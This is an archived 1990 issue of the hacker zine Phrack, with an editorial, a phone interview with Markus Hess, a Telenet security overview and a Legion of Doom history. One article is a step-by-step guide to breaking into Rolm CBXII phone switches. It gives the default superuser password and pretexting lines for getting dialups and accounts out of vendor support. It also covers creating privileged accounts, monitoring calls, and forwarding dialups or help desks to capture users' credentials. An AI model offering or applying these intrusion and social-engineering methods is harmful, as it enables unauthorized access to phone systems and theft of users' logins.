home *** CD-ROM | disk | FTP | other *** search
Text File | 1991-07-04 | 162.3 KB | 3,642 lines |
-
-
-
- ==Phrack Inc.==
- Volume Three, Issue Thirty-one, Phile #1 of 9
- Issue XXXI Index
- ________________
- P H R A C K 3 1
- 05/28\90
- ________________
-
- Welcome to a new begining of Phrack Inc. Yes, Phrack is not dead.
- On the contrary, Phrack will and can't ever die. Phrack is more than just
- a technical newsletter that comes out every now and then, it's a symbol of our
- hacking history. Whether, it's called Phrack or some other name, it will
- always be published for the same reasons:
- 1. Inform it's readers of current events and other related items
- of hacker interest.
- 2. Educate it's readers on all topics of shared common interests
- that may benefit the hacker at his hobby.
- 3. Remain an authority in the hacking world and an observer in the
- ever growing technical community.
- 4. Be open to anyone who wishes to submit an article for publication
- that will further the hacker's education.
- Many things have happened since the last publication of Phrack. We at
- Phrack inc. will try to "shed some light" on the matters that have occured. And
- as for all these ridiculous rumors that have been spreading, let us speak the
- truth and be heard.
- Hah. No my friends, Phrack is not dead..
- --DH (Editor)
- Note: If you wish to contact Phrack inc. to submit a file, ask around for
- a Phrack inc. distribution site -- Then Email "Phrack inc." and be very very
- patient.
- Note: Special thanks to T C, Phz, and others for wide
- area distribution.
- _______________________________________________________________________________
-
- Phrack XXXI Table of Contents
- =============================
- 31-1. Introduction to Phrack 31 by DH (2K)
- 31-2. Phrack Pro-Phile of Markus Hess by PHz (6K)
- 31-3. Hacking Rolm's CBXII by DH (15K)
- 31-4. TAMS & Telenet Security by Phreak_Accident (7K)
- 31-5. The history of The Legion Of Doom (10K)
- 31-6. Cosmos Overview by EBA (52k)
- 31-7. Tymnet Security Memo by Anonymous (9K)
- 31-8. PWN/Part01 by Phreak_Accident (13K)
- 31-9. PWN/Part02 by Phreak_Accident (17K)
- 31-10. PWN/Part03 by Phreak_Accident (40K)
- _______________________________________________________________________________
-
- ==Phrack Inc.==
- Volume Three, Issue Thirty-one, Phile #2 of 10
- -*[ P H R A C K # 3 1 P R O P H I L E ]*-
- -*[ June 1, 1990 ]*-
- -*[Phz]*-
- ---[ Markus Hess ]---
- Recently the Phrack editors had the opportunity to talk to Markus Hess in
- his tiny Hannover flat. This special edition of the Phrack Prophile details
- our conversation, as well as general background information about the German
- Hacker.
- This Phrack Prophile is not in the same format as previous ones because of
- the nature of the profile. In the next issue, we will reform back to the
- orginal creator's format.
- AGE: 26
- HEIGHT: 5' 10"
- HAIR COLOR: BROWN
- EYES: BROWN
- FROM: Hannover, West Germany
- PAST EMPLOYMENT: Software developer in Hannover.
- PEOPLE: Stephen Winero, Walu Holland (Other CCC members)
- STRENGTHS: AT&T Unix, VAX, SunOs and BSD os's
-
- Hess, most well known as the hacker who's exploits are detailed in
- Clifford Stoll's _The_Cuckoo's_Egg_, "is as paranoid on the telephone as he
- is on the computer." Although he was very reluctant to talk to us, we did
- manage to talk to him about hacking and _The_Cuckoo's_Egg_.
- Ringing Hanover..
- RING
- RING
- RING
- ANSWERED
- HESS: Hallo?
- PHRACK: Is this Markus Hess?
- HESS: Yes.
- PHRACK: Do you smoke Benson & Hedges?
- (At this point we weren't sure it was actually him)
- HESS: Yes, who is this?
- PHRACK: We are calling from the USA, we want to ask you some questions.
- We talk to hackers in the USA.
- HESS: I won't have anything to do with hackers anymore. I have talked in
- court earlier this year.
- PHRACK: Did you know you were in a novel about a hacker in the US?
- HESS: Novel? Yes, I know of a novel.
- PHRACK: Have you read the book?
- HESS: Yes I have read the book.
- PHRACK: Is it all true? Is it all true? Do you think Cliff lied or tried
- to exaggerate in the book?
- HESS: Yes, I think so.
- HESS: Yes, He lied.
- PHRACK: Have you ever talked to Stoll?
- HESS: I have talked to him, but not privately. I don't want to talk about
- this.
- PHRACK: Have you ever seen Cliff Stoll?
- HESS: Yes I have seen him.
- (We might think this from the back of the book)
- PHRACK: He's goofy looking isn't he?
- HESS: goofy? I don't understand.
- PHRACK: Anyway, so you think he lied in the book?
- HESS: Yes, he lied.
- PHRACK: What did he lie about?
- HESS: I don't want to talk about this.
- PHRACK: Okay, are you in the Chaos Computer Club?
- HESS: No, I won't have anything to do with hackers any more.
- PHRACK: Were you ever involved with them?
- HESS: No. I was not in it.
- PHRACK: Do you know anyone in it [the CCC]?
- HESS: Yes. I really must go now.
- PHRACK: Who do you know in it [the CCC]?
- HESS: Stephen Winero.
- PHRACK: Is that it?
- HESS: I know Walu.
- PHRACK: Hmm. Are you being watched?
- HESS: I think so. I can not talk about this.
- PHRACK: Were you scared of going to jail?
- HESS: jail?
- PHRACK: Prison, were you scared of going to prison?
- HESS: I don't know.
- PHRACK: What happened in your words at court?
- HESS: In your words? I don't understand.
- PHRACK: What happened in court?
- HESS: I don't understand.
- PHRACK: Forget it.
- PHRACK: Do you still have your computer?
- HESS: No. I don't have any computer here.
- PHRACK: Did you think they were going to catch you?
- HESS: No. I knew nothing of it.
- PHRACK: Has any other hackers tried to contact you in the U.S.?
- HESS: No. You are the first to call.
- PHRACK: So is it my understanding that Stoll lied in parts of the book?
- HESS: Lied? Yes he lied.
- PHRACK: Why do you think he would lie?
- HESS: I don't know.
- PHRACK: Do you think he made you look destructive?
- HESS: Yes. He made me look mean.
- PHRACK: Are you? Mean that is?
- (Chuckle)
- HESS: No. He made me look like I was a criminal.
- PHRACK: Why did you do it Markus?
- HESS: Do what?
- PHRACK: Hack all over the network like that?
- HESS: I cannot answer.
- PHRACK: Do they call you a liar in court?
- HESS: Yes. They call me a liar.
- PHRACK: What are you going to do now?
- HESS: I don't understand.
- PHRACK: Are you finished with hacking?
- HESS: Yes, I have nothing to do with hackers.
- PHRACK: Was someone helping you hack?
- HESS: I cannot answer.
- PHRACK: How come you cannot answer that question?
- HESS: I cannot.
- PHRACK: Yes, well, Many in the U.S. [hackers] don't like the Novel.
- PHRACK: What do you think of it?
- HESS: It is not true.
- HESS: I don't know.
- PHRACK: Who taught you the EMACS hole?
- HESS: I cannot say.
- PHRACK: Then you must have been working with someone, correct?
- HESS: No, I cannot answer.
- PHRACK: Is the police comming down on you hard?
- HESS: police? I don't und...
- PHRACK: Yeah, yeah. The law? Are they being hard on you.
- HESS: Yes.
- <SILENCE>
- HESS: I must go now.
- PHRACK: Can we call you later?
- HESS: Umm, I don't know. No.
- PHRACK: Why not?
- HESS: I cannot answer.
- PHRACK: What about in a couple of months?
- HESS: Yes, in a couple of months you can call.
- PHRACK: Your not moving are you?
- (Knowing that Germans rarely ever move and their phone
- numbers never change this was a silly Q.)
- HESS: No. I no move.
- PHRACK: Okay, then we'll call you in a couple of months.
- HESS: Okay. I must go.
- PHRACK: Wait a second.
- HESS: Yes?
- PHRACK: Do you have anything to say to American Hackers?
- HESS: No.
- HESS: I have nothing to do with hackers.
- PHRACK: Well, good luck.
- HESS: Yes, you too.
- <CLICK>
-
- Unfortunately, our lack of German and Hess' weak English made
- communication difficult. He is a very paranoid person who was obviously
- uncomfortable talking to us.
- Those of you that have read Stoll's book know that Hess was involved
- with hacks on American Military Computers, and indirectly involved with
- Computer Espionage and the KGB. Phrack strongly discourages trying to
- hack Military computers and particularly takes offense to computer
- espionage.
- From the information we have gathered from him and by talking to him,
- we feel that Markus Hess wasn't as smart as Clifford Stoll portrayed him to be.
- We also feel that Markus was not working alone and that others were involved.
- This however we cannot be 100% sure because of our communication faults.
-
- _______________________________________________________________________________
-
- ===Phrack Inc.===
- Volume Three, Issue Thirty-one, Phile #3 of 10
- /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
- / * * \
- \ /
- / Hacking Rolm's CBXII/9000 \
- \ by DH /
- / 05/24/90 \
- \ * * /
- \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
-
- Introduction
- ------------
- IBM Rolm's CBXII/9000 is a very powerful machine. Powerful in the aspect
- that one has the switch(s) at his control. Controling switches means you can
- control the entire PBX environment (And it's users).
- This file will not get technical. Basically, I'm writing this file on
- the HOW-TO's of the internal works of CBXII and the basics of obtaining the
- dialups and account information need to access the machines. For further
- information on CBX's in general, read Epsilon's Phrack Phile on them, or
- consult Evil Jay's phile on OSL's.
-
- Obtaining Dialups
- --------- -------
- Obtaining dialups unfortunately is the hardest part of hacking CBXII's.
- (Yes, even harder than hacking them). There are several ways to obtain the
- dialups. I would say a good bit of CBX's are at universities and hospitals
- where they own their own switches. Most of the time you can determine if they
- have one by calling the Telecommunications Department of the target location.
- Or, another way is to check with ROLM. If you *KNOW* that a target location
- has a CBXxx machine, you can call ROLM's 800 wats line and say your with the
- Telecommunications Department and your looking for the DIALUP. Rolm has files
- on all their CBXxx's and the Dialups also. They might ask you for a NODE #
- for the dialup, and you should usually respond with what node you want (Since
- different nodes handle different areas of the PBX). Basically, nodes start at
- ONE and usually goto THREE or FOUR, depending on the size of the PBX.
- CBXxx's are greatly compatible of IBM Rolm's Phone-Mail system (Which
- is a highly used and common voice mail system). This of course doesn't mean
- that every PHM (Phone-Mail) system has a CBXxx attached. But it is generally
- a good start.
- The following is a checklist to determine if the target location could
- have a CBXxx for controlling their switch. By no means however, if your target
- location has all of the following it could have a CBXxx.
- 1) Does the location handle it's own switch?
- If so, what kind, and who services it.
- 2) Does IBM Rolm handle any aspect of their telecommunications
- department?
- If so, this is a possible CBXxx location.
- 3) Does the location have Rolm Phone-Mail?
- These three guidelines are not requirements. I.E. -- The location
- could have a non-IBM PBX but still have a CBXxx for handling the switch.
- So who knows.. It's up to you and your bullshitting and scans.
- Hacking the CBXxx's
- ------- --- -------
- Well, once you have obtained the dial-ups, you are almost halfway
- there. Hacking the CBX is the easy part. 1st off, IBM Rolm ships *ALL*
- of their machines with a default account (Yes, and they never change it).
- When the destination of the CBX recieves the machine, they use the default
- to create other accounts for employees, PBX operators, and administration.
- Rolm IBM also has a field support account embedded in the machine. These
- are different to each location and correspond to the serial number of the
- machine (Rolm's accounts can be obtained from Rolm's 800 technical support
- line). So, now that we know that there is a default account that telecom
- department uses to setup the other accounts after they recieve the machine,
- tells us that this is a priviledge account. And it is.
- USERNAME: SU
- PASSWORD: SUPER
- How nice for them to give us such power. Yes, it's a basic default
- with SuperUser priviledge. If for some reason the account default has been
- changed, their are other ways of getting in:
- 1) Call Rolm and get the Field account information.
- 2) Try first names of Telecom Dept. employees, and PBX Operators.
- 3) Use every Hacking skills you have (If any).
- Some older versions of CBX don't even require logging in with an
- account. Those versions are less responsive to the administrators needs,
- but can be useful to one also. Don't be discouraged if the SU password is
- changed, just call Rolm and get the field account.
- The following is the matrix before one access the machine. *Note that
- it clearly identifies* *Also: Accessible at 300 baud and e,7,1*
- CONNECT ID banner
- _Release version # /
- / /\
- Rolm CBXII RELEASE 9004.0.65 RB74UCLA11956
- BIND DATE: 8/SEP/88 \
- YOU HAVE ENTERED NODE 1, CPU 2 \_Name of owner, IE: UCLA
- 11:14:30 ON FRIDAY 2/11/1990 (System ID)
- USERNAME: xxx
- PASSWORD: xxx
- INVALID USERNAME-PASSWORD PAIR.
-
- Once your in
- ---- ---- --
- Once your in, you should have no problems wondering around the
- machine and using the utilities in the machine's operating system. There is
- very specific help functions inside the machine that will guide you through
- with no problems. At the CBX prompt:
- %. HELP ?
- or
- %. ?
- Should produce a valid listing of options and sub-functions. Every
- function can be followed with a '?' to give lists of valid sub-functions under
- that function or how the syntax of that function should be used.
- The following is a listing of commands for CBXII/9000:
- ABORT ACTIVATE ATTR BYE
- CANCEL CARD CDRSM CDT
- CHANGE CHG CLEAR CLR
- CMPCT CMSTS CNCL CNFG
- CONVERT COPY CPEG CTMON
- CTRA CTRTL CXCLR COPY
- CXCLR CXCON CXNET DACK
- DADD DAEVT DANS DBDMP
- DCAT DCF DCOM DDMA
- DDQ DDT DE DEACTIVATE
- DEFINE DELETE DEMOUNT DESUM
- DEX DFACK DFCOM DFEAT
- DFEVT DHTQ DHWS DIAG
- DIQ DISABLE DIWQ DKQ
- DML DMNT DMS DMTST
- DOWN DPATR DPMR DPMS
- DPPRI DPTR DQQ DRCT
- DREGS DSBLE DSQ DSST
- DSTAK DTCB DTDQ DWQ
- DX_TR ENABLE ENB ENBLE
- ETIO EX EXM EXN
- EXP EXPAND FINIT FORMAT
- FREER FSD GTOD HDBST
- HELP INSTALL KPFA LCT
- LIST LOAD LOGOFF LOGON
- LPEG LPKT LSCT LSL
- LST LTCB MNT MONITOR
- MOUNT MTRACE NEXT NSTAT
- PAGE PCNFG PDIO PFA
- PKTS PLIST PLTT PPFA
- PS PSH QAT QITM
- QTEST RCT RECEIVE RENAME
- REPLY RESTART RESTORE REVERSE
- RM RMOFF RPFA RSC
- RSCLK RSTOR RSTRT SAT
- SCAN SEND SET SHOW
- SITM SOCON SOUNC SSAT
- START STATE STATUS STEST
- STOD STOP STRT STS
- TDCD TEST TKSTS TRTL
- TST TX UNLK UNLOCK
- UP VERIFY XDEF XMIT
- XPND
- These commands can be executed from and '% ' prompt. If the command is
- followed by a '?', more information will be supplied about the command.
- Using the ICI
- ----- --- ---
- The Interactive Configuration Interface controls immediate changes in
- the switch and PBX environment. The Utility is explained in great detail
- through the actual running of it. You can access the ICI by typing:
- % CNFG
- CBXII/9000
- INTERACTIVE CONFIGURATION INTERFACE
- CPU 2
- 15:14:32 ON FRIDAY 5/02/1990
- COMMAND:
- This is the main command prompt. From here you can exercise the '?'
- help list to get valid commands. There are four phases of the ICI utility:
- Modify, Create, List, and Delete. These can be used on Extentions, Trunks,
- Logon accounts, Feature Group sequences, Data_line access, Trunk Groups, ect.
- The following is a sample of using 'list' to list a current extention in the
- PBX:
- _Forward to EXTN 2000
- COMMAND: LIST EXT 4038 / _Outside number
- / FORWARD ON / to forward to
- FORWARDING BSY RNA DND /
- EXTN TYPE COS TARGET1 TARGET2 I E I E I E RINGDOWN NAME
- ---- ---- --- ------- ------- - - - - - - -------- ----------
- DS 4038 EXTN 56 2000 1 1 1 1 1 1 95551212 R.STABELL
- \ \ \ / / \ \
- Extention / -Class of service if R Auto. Forward Owner of
- --Type of line BUSY I No Matter What EXTN.
- (Reg. Extention) N
- G
- Note: The 1's specifies to forward to target#1 & NO ANSWER
- (As 2's would mean forward to #2 target)
- This should detail how to modify a listing like above using the 'MODIFY'
- command in the ICI. Once modified, all transactions are processed immediately.
- Using the 'Delete' command one can delete extentions, trunks, ect.
- So now we have the following commands in ICI: MODIFY, DELETE, LIST, CREATE.
- Each can be used with the following "Nouns" to modify that "Noun":
- BUTTON_120 BUTTON_240 CDR_EXCLUDE CNFG_ERRORS
- CNFG_QUEUE CNFG_STATUS CNFG_USERS COM_GROUP
- COS_FEAT DATA_ACCESS DATA_DEVICE DATA_GROUP
- DATA_LINE DATA_SUBMUX DLI ETS
- EXTEN FAC FAC_TYPE FAMILY
- FEAT_CODE FIRST_DIGIT HD_GROUP LEX
- LOGON_PROFILE MAP MEM_PARTS PARAM
- PICK POWER Q_TYPE ROUTE_LIST
- RP RPD RPI RPS_120S_ON
- RPS_240S_ON SAT_NAME SEARCH_SEQ SECTION
- SECURITY_GROUP SERVICE_LIST SIO_PARTS SLI
- SPEED T1D3 T1D3_GRP TRUNK
- TRUNK_GROUP VPC
- The FAMILY, LOGON_PROFILE, and CNFG_USER all deal with the accounts on
- the system. One can use MODFIY or CREATE to set them up an account with SU
- access. The FAMILY noun is the listing of the groups with different access,
- to different "nouns" available. I.E.: Not everyone can access the CHANGE
- LOGON_PROFILE to create an account.
- To create an account with SU access, type (while in ICI):
- % CREATE LOGON_PROFILE
- ENTER NAME (1-12 CHAR): TEST
- ENTER PASSWORD: TEST
- RETYPE: TEST
- Next it will ask you for a family. For SU access, type "SYSTEM_ADMIN".
- After family, the machine should prompt you for a "verb". Verbs are the actual
- functions or commands, so in this environment you can set the commands a user
- can access. So, for SU, enter "ALL" for every command access.
- To get a valid listing of users online, try this:
- % LIST CNFG_USERS
- NUMBER OF USERS MAX NUMBER OF USERS
- 3 5
- PORT USER_NAME START_TIME HOW_LONG
- 17 SU 17:47:57 0:28:34
- 2 FIELD 18:16:03 0:0:28
- 3 MARYB 18:16:03 0:10:03
-
- Using the Monitoring Utility
- ----- --- ---------- -------
- This command is one of the more powerful commands in the CBXxx system.
- The monitor command should be invoked from within the main function command
- level and not in the ICI level. The monitoring command allows you to actually
- watch or monitor TRUNKS and EXTENTIONS. So, if I were to type:
- % MONITOR EXT 4038
- 10:02:43 ON FRIDAY MAY/02/1990
- EXT# STATE DI CODE DIGITS PROCESS STATUS
- ---- --------------- -- ---- ------------- ------------ ------
- 4038 IDLE STN FWD NUM FWD
- \ \ / / / \
- Extention Not in use Standard \ / Forwarded
- Extention \ /
- Forwarded to
- a number
- This shows the extention to be IDLE and not in use. But, with forwarded
- call processes to a standard number. You would have to use ICI to look up the
- number it's forwarded to if you wanted.
- % MONITOR EXT 4038
- 10:03:44 ON FRIDAY MAY/11/1990
- EXT# STATE DI CODE DIGITS PROCESS STATUS
- ---- -------------- -- ---- ------------- ----------- ------
- 4038 DIAL TONE STN FWD NUM FWD
- 4038 DIALING Y 9 / \ \ \
- 4038 DIALING Y 92 S F N \Extention
- 4038 DIALING Y 923 t o u Forwarded
- 4038 DIALING Y 9233 a N r m
- 4038 DIALING Y 92334 n u w b
- 4038 DIALING Y 923345 d m a e
- 4038 DIALING Y 9233456 a b r r
- 4038 DIALING Y 92334564 r e d
- 4038 CONN T025N N \ d r e
- / \ / \ d
- \ \ \_Dialing NO \_Number dialed
- \_Extention \
- Connected to
- Outside trunk T025N
- This monitoring shows the extention actually dialing the number, and then
- connecting to an outside truck. Unfortunatley, one we cannot monitor without
- access to a bell switch.
- Monitoring can also be done with trunks. I will not display any trunk
- monitoring since it is quite simple to decypher.
- Manipulating the switch
- ------------ --- ------
- There are many ways you can manipulate the CBX's to gain accounting
- information on data lines within the PBX environment. One sure-fire method
- would be to forward an actual data dial-up extention to a bridge or loop and
- then write an emulation to intercept the user's account information real-time
- as they connect to your fake dial-up.
- Or perhaps if an university uses the CBX, one could maybe forward the
- computer help desk extention to a bridge or loop and as an unsuspecting user
- calls up, ask him what machine and account info he has access to for a help
- log sheet you are taking.
- Who cares. Who knows. There are thousands of things you can do to use
- the CBX to your advantage. Hell, you have the whole switch at your command.
- DH - 05/11/90
-
- _______________________________________________________________________________
-
- ==Phrack Inc.==
- Volume Three, Issue Thirty-one, Phile #4 of 10
- / Everything you always wanted to know.. \
- / about Telenet Security, But were to stupid to find out. \
- By Phreak_Accident
- Ever since the early 80's GTE Telenet has been expanding their public
- packet switching system to hold enormous amounts of users. Currently GTE
- SprintNet (Yes, Telenet is out, SprintNet is in.) has over 300 nodes in the
- United States and over 70 other nodes abroad. SprintNet provides private
- X.25 networks for larger companies that may have the need. These private
- networks are all based on SprintNet's 3270 Dedicated Access Facility which
- is currently operating for public use, Hence for the major security Sprint-
- Net has aquired.
- SprintNet's security department is a common idea of what any large
- public packet network should be. With their home office located in Virgina
- (703), most Hacker's who run into trouble with them would wind up talking
- to Steve Mathews (Not the head of security but a prime force against the
- major attacks Sprintnet recieves from Hackers anually.), who is a very
- intelligable security analysist that deals with this type of problem daily.
- Because of Steve's awarness on Hackers invading "His" system (As most
- security personnel refer to the system's they work for as their own.), He
- often does log into Bulletin Boards accross the country looking for Sprint-
- Net related contraband. At the time of this article, Steve is running an
- investigation on "Dr. Dissector's" NUAA program. (NUA attacker is a Sprint-
- Net NUA scanner.) Besides this investigation, he currently stays in contact
- with many Hackers in the United States and Abroad. It seems Steve recieves
- many calls a month from selected Hackers that have interests in the Security
- of SprintNet. Wow. Who the Hell would want to call this guy. From many
- observations of Steve Mathews, I find him to in deed be the type to feel a
- bit scared of Hackers. Of course, his fright is really quite common amoung
- security personnel since most fear for their systems as well as themselves.
- (Past experiences have showed them not to take Hackers lightly, Hence they
- have more contacts then 60 rolodex's put together.)
- For now, let's forget Steve Mathews. He's not important an important
- influence in this article. Trying to pin a one-person in a security depart-
- ment that handles security is like finding a someone on a pirate board that
- doesn't use the word "C0DE" in their daily vocabulary.
- Telenet's main form of security lies in their security software called
- TAMS (Telenet Access Manager System). The TAMS computers are located in Res-
- tin, Virginia but are accessable throughout the network. Mostly, the main
- functions of TAMS are to:
- * Check to see if the NUI/Password entered is a valid one.
- * Check to see if the Host has list of NUI's that can access
- that host. If another NUI is used, a Rejection occurs.
- * Processes SprintNet's CDR (Call Detail Recording), which
- includes Source and Destination, Time of call, Volumes
- of data recieved, and the Total time of the call.
- * Can be used by host to add an optional "ALPHA" NUA for "easy"
- access.
- * Can secure Hosts further by adding an NUA security password.
- * Restricts calls without an NUI for billing (I.E. No collect
- calls to be processed).
- * Accepts all calls to host as a prepaid call (I.E. Accepts all
- calls).
- TAMS is really for the handling of NUI and corresponding NUA's, therefore
- being a security concept. TAMS holds all the data of NUI's and restricting NUAS
- for the ENTIRE network. If one could gain the access to TAMS, one could have
- the entire network at his/her disposal. This of course if highly impossible
- to SprintNet's security department, but not for a couple of hackers I have ran
- into. Yes, TAMS is quite interesting.
- In other aspects of SprintNet security, lets focus on the actual X.25
- software that they use. Anybody who tells you that Telenet can monitor the
- sessions currently taking place on THEIR network is WRONG (And probably very
- stupid as well). Monitoring is a basic feature of all X.25 networks, whether
- it's a little PeeShooter network or not, they can and do monitor sessions.
- Of course their are far to many calls being placed on SprintNet to be
- monitored, but a scared host can always request a full CDR to be put on their
- address to record all sessions comming in on that NUA. Such as the many re-
- corded sessions of the ALTOS chat(s) in Germany that was a hot-spot for many
- Hackers across the United States and Abroad. After the detection of ALTOS,
- through the hundereds of illegally used NUIs, CDR's and direct host monitoring
- were used on the ALTOS hosts. As far as prosecutions concern, I doubt their
- were any.
- Now, as far as other security software on SprintNet, they have a call
- tracking service that is called AUTOTRAIL. Basically, AUTOTRAIL traces the
- connections through the DNIC's and back to the orginating NUI and/or NODE loca-
- tion that placed the call.
- AUTOTRAIL has nothing to do with ANI. Not at all. In fact, the many
- dialups that lead into SprintNet's PDM gateway do NOT have any type of ANI.
- That is basically a telephony problem. ALthough I would think twice about
- messing with a dialup that is run on a GTE carrier. That's up to you though.
- Another aspect of security in which Telenet offers is an ASCII tape
- that can be obtained by a host customer, which contains all CDR information of
- any connection to that host for the last week/month/year. So, it is obvious
- to say that SprintNet does have a hudge database of all CDRs. Yes, another
- point: This database is located in the TAMS computer. Hmm, ahh.. Wouldn't
- that be neat.
- :PA
-
- _______________________________________________________________________________
- ==Phrack Inc.==
- Volume Three, Issue Thirty-one, Phile #5 of 10
-
- The History of The Legion Of Doom
- --- ------- -- --- ------ -- ----
- During the summer of 1984 an idea was formulated that would ultimately
- change the face of the computer underground forever. This particular
- summer, a huge surge of interest in computer telecommunications placed
- an incredibly large number of new enthusiasts on the national computer scene.
- This crowd of people all seeking to learn as much as possible
- began to put a strain on the nation's bulletin board scene, as the novices
- stormed the phonelines in search of knowledge. From out of this chaos
- came a need for learned instructors to help pass on their store of
- information to the new throngs.
- One of the most popular bulletin boards of the day was a system in New York
- state called Plovernet, which was run by a person who called himself
- Quasi-Moto. This BBS was so heavily trafficked, that a major long
- distance company began blocking all calls to its number (516-935-2481).
- The co-sysop of Plovernet was a person known as Lex Luthor. At the time
- there were a few hacking groups in existence, such as Fargo-4A and Knights of
- Shadow. Lex was admitted into KOS in early 1984, but after making a few
- suggestions about new members, and having them rejected, Lex decided to
- put up an invitation only BBS and to start forming a new group.
- Starting around May of 1984, Lex began to contact those people who he had
- seen on BBSes such as Plovernet and the people that he knew personally
- who possessed the kind of superior knowledge that the group he envisioned
- should have. Many phone calls and Alliance Teleconferences later, the
- group of individuals who made up the original Legion of Doom were compiled.
- They were:
- Lex Luthor
- Karl Marx
- Mark Tabas
- Agrajag the Prolonged
- King Blotto
- Blue Archer
- EBA
- The Dragyn
- Unknown Soldier
- The group originally consisted of two parts: Legion of Doom, and Legion
- of Hackers. The latter was a sub-group of the first, comprised
- of people who were more advanced in computer related subjects. Later on,
- as members began to all become more computer-based, the Legion of Hackers
- was absolved. (The name "Legion of Doom" came from the cartoon series
- "Superfriends," in which Lex Luthor, Superman's arch rival, led a group
- by the same name)
- The actual Legion of Doom bulletin board was quite ahead of its time.
- It was one of the first "Invitation-only" hacking based BBSes; it was the
- first BBS with security that caused the system to remain idle until
- a primary password was entered; and it was the first hacking BBS to deal
- with many subjects in close detail, such as trashing and social
- engineering. The BBS underwent three number changes and three different
- login procedures during its life. At its height, the BBS had over
- 150 users and averaged about 15 posts per day. This may seem
- high when compared to contemporary BBSes, but this was a private system,
- with only very-competent users, so the quality of messages content was always
- high.
- There was always some confusion that falsely assumed since someone
- was on the LOD BBS, that they were a member of the group. In fact,
- only a handful of the total LOD membership were ever on the actual
- LOD BBS.
- The Legion of Doom also had special subboards created for its members on
- other BBSes after the home base BBS went offline. The first was on
- Blottoland, the next on Catch-22, followed by one on the Phoenix Project,
- and the last on Black Ice Private. The group's members have usually tried to
- keep a low profile publicly, and usually limited their trade of information
- to select private BBSes and personal telephone conversations. This adherence
- to privacy has always added to the LOD mistique. Since most people didn't
- know exactly what the group was involved in, or experimenting with, people
- always assumed that it was something far too detailed or sensitive to be
- discussed. For the most part, this was not true, but it did not help to
- diminish the paranoia of security personnel that LOD was after their
- company's systems.
- The group has undergone three distinct phases, each a result of membership
- changes. The first phase ended with the busts of Marx, Tabas, Steve Dahl,
- Randy Smith, X-man, and the abandonment by Agrajag and King Blotto.
- The group lay semi-dormant for several months, until a resurgence
- in the summer of 1986, in which several new members were admitted, and a new
- surge of would-be hackers appeared, ready to be tutored. This phase again
- ended in a series of busts and paranoia. The third phase basically revolved
- around Summercon of 1988, where several new members were admitted by those
- LOD members attending the festivites. The third phase is now at an end
- brought on by busts and related paranoia, again, two years after its onset.
- There is no indication that points to any resurgence in the future, but
- nothing is certain until summer.
- Since its creation, LOD has tried to put out informative files on a wide
- variety of topics of interest to its contemporaries. These files ranged from
- the first actual scanned directory of Telenet, to files on various operating
- systems. The LOD Technical Journal was to be a semi-regular electronic
- magazine comprised of such files, and other items of interest to the hacking
- community. Only three issues of the Technical Journal were produced. As
- the fourth issue was being pieced together, several members were raided, and
- work on it was abandoned.
- >From the time it was formed continuing up to the present, the Legion of
- Doom has been quite a topic of controversy in the computer underground and
- with computer security professionals. The Legion of Doom has been
- called everything from "Organized Crime" to "a Communist threat to national
- security" to "an international conspiracy of computer terrorists bent
- on destroying the nation's 911 service." Nothing comes closer to the
- actual truth than "bored adolescents with too much spare time."
- LOD members may have entered into systems numbering in the tens of
- thousands, they may have peeped into credit histories, they may
- have monitored telephone calls, they may have snooped into files and
- buffered interesting text, they may still have total control over
- entire computer networks; but, what damage have they done? None, with
- the exception of unpaid use of CPU time and network access charges. What
- personal gains have any members made? None, with the exception of three
- instances of credit fraud that were instigated by three separate greedy
- individuals, without group knowledge.
- The Legion of Doom will long be remembered in the computer underground as
- an innovative and pioneering force, that consistently raised the collective
- level of knowledge, and provided many answers to questions ranging from the
- workings of the telephone system to the structure of computer operating
- systems. No other group dedicated to the persuit of computer and
- telecommunications knowledge has survived longer, and none probably will.
- The Legion of Doom 1984--1990
- ------------------------------------------------------------------------------
-
- Alumni of the Fraternal Order of the Legion of Doom (Lambda Omega Delta)
- Handle Entered Exited Location Reasons for leaving
- ------------------------------------------------------------------------------
- Lex Luthor Early 84-- Florida
- Karl Marx Early 84--Late 85 Colorado Bust w/Tabas..College
- Mark Tabas Early 84--Late 85 Colorado Too numerous to list
- Agrajag the Prolonged Early-84--Late 85 California Loss of Interest
- King Blotto Early 84--Late 85 Ohio College
- Blue Archer Early 84--Late 87 Texas College
- EBA Early 84-- Texas
- The Dragyn Early 84--Late 86 Minnesota Loss of Interest
- Unknown Soldier Early 84--Early 85 Florida Bust-Toll Fraud
- Sharp Razor Late 84--Early 86 New Jersey Bust-Compuserve Abuse
- Sir Francis Drake Late 84--Early 86 California Loss of Interest
- Paul Muad'dib Late 84--Early 86 New York Modem Broke
- Phucked Agent 04 Late 84--Late 87 California College
- X-Man Late 84--Mid 85 New York Bust-Blue Boxing
- Randy Smith Late 84--Mid 85 Missouri Bust-Credit Fraud
- Steve Dahl Early 85--Early 86 Illinois Bust-Credit Fraud
- The Warlock Early 85--Early 86 Florida Loss of Interest
- Terminal Man Early 85--Late 85 Massachusetts Expelled from Group
- Dr. Who Early 85--Late 89 Massachusetts Several Reasons
- The Videosmith Early 86--Late 87 Pennsylvania Paranoia
- Kerrang Kahn Early 86--Mid 89 London, UK Loss of Interest
- Gary Seven Early 86--Mid 88 Florida Loss of Interest
- The Marauder Early 86--Mid 89 Connecticut Loss of Interest
- Silver Spy Late 86--Late 87 Massachusettts College
- Bill from RNOC Early 87--Late 87 New York Bust-Hacking
- The Leftist Mid 87--Late 89 Georgia Bust-Hacking
- Phantom Phreaker Mid 87-- Illinois
- Doom Prophet Mid 87-- Illinois
- Jester Sluggo Mid 87-- North Dakota
- Carrier Culprit Mid 87--Mid 88 Pennsylvania Loss of Interest
- Master of Impact Mid 87--Mid 88 California Loss of Interest
- Thomas Covenant Early 88--Early 90 New York Bust-Hacking
- The Mentor Mid 88--Early 90 Texas Retired
- Necron 99 Mid 88--Late 89 Georgia Bust-Hacking
- Control C Mid 88--Early 90 Michigan
- Prime Suspect Mid 88-- New York
- The Prophet Mid 88--Late 89 Georgia Bust-Hacking
- Phiber Optik Early 89--Early 90 New York Bust-Hacking
- ** AKA **
- Randy Smith Poof!
- Dr. Who Skinny Puppy
- Kerrang Kahn Red Eye
- Phantom Phreaker ANI Failure / Psychedelic Ranger
- Doom Prophet Trouble Verify
- Thomas Covenant Sigmund Fraud / Pumpkin Pete
- Necron 99 The Urvile
- Control C Phase Jitter
-
- _______________________________________________________________________________
- ==Phrack Inc.==
- Volume Three, Issue Thirty-one, Phile #6 of 10
-
- L OO DD
- L O O D D
- LLL OO DD
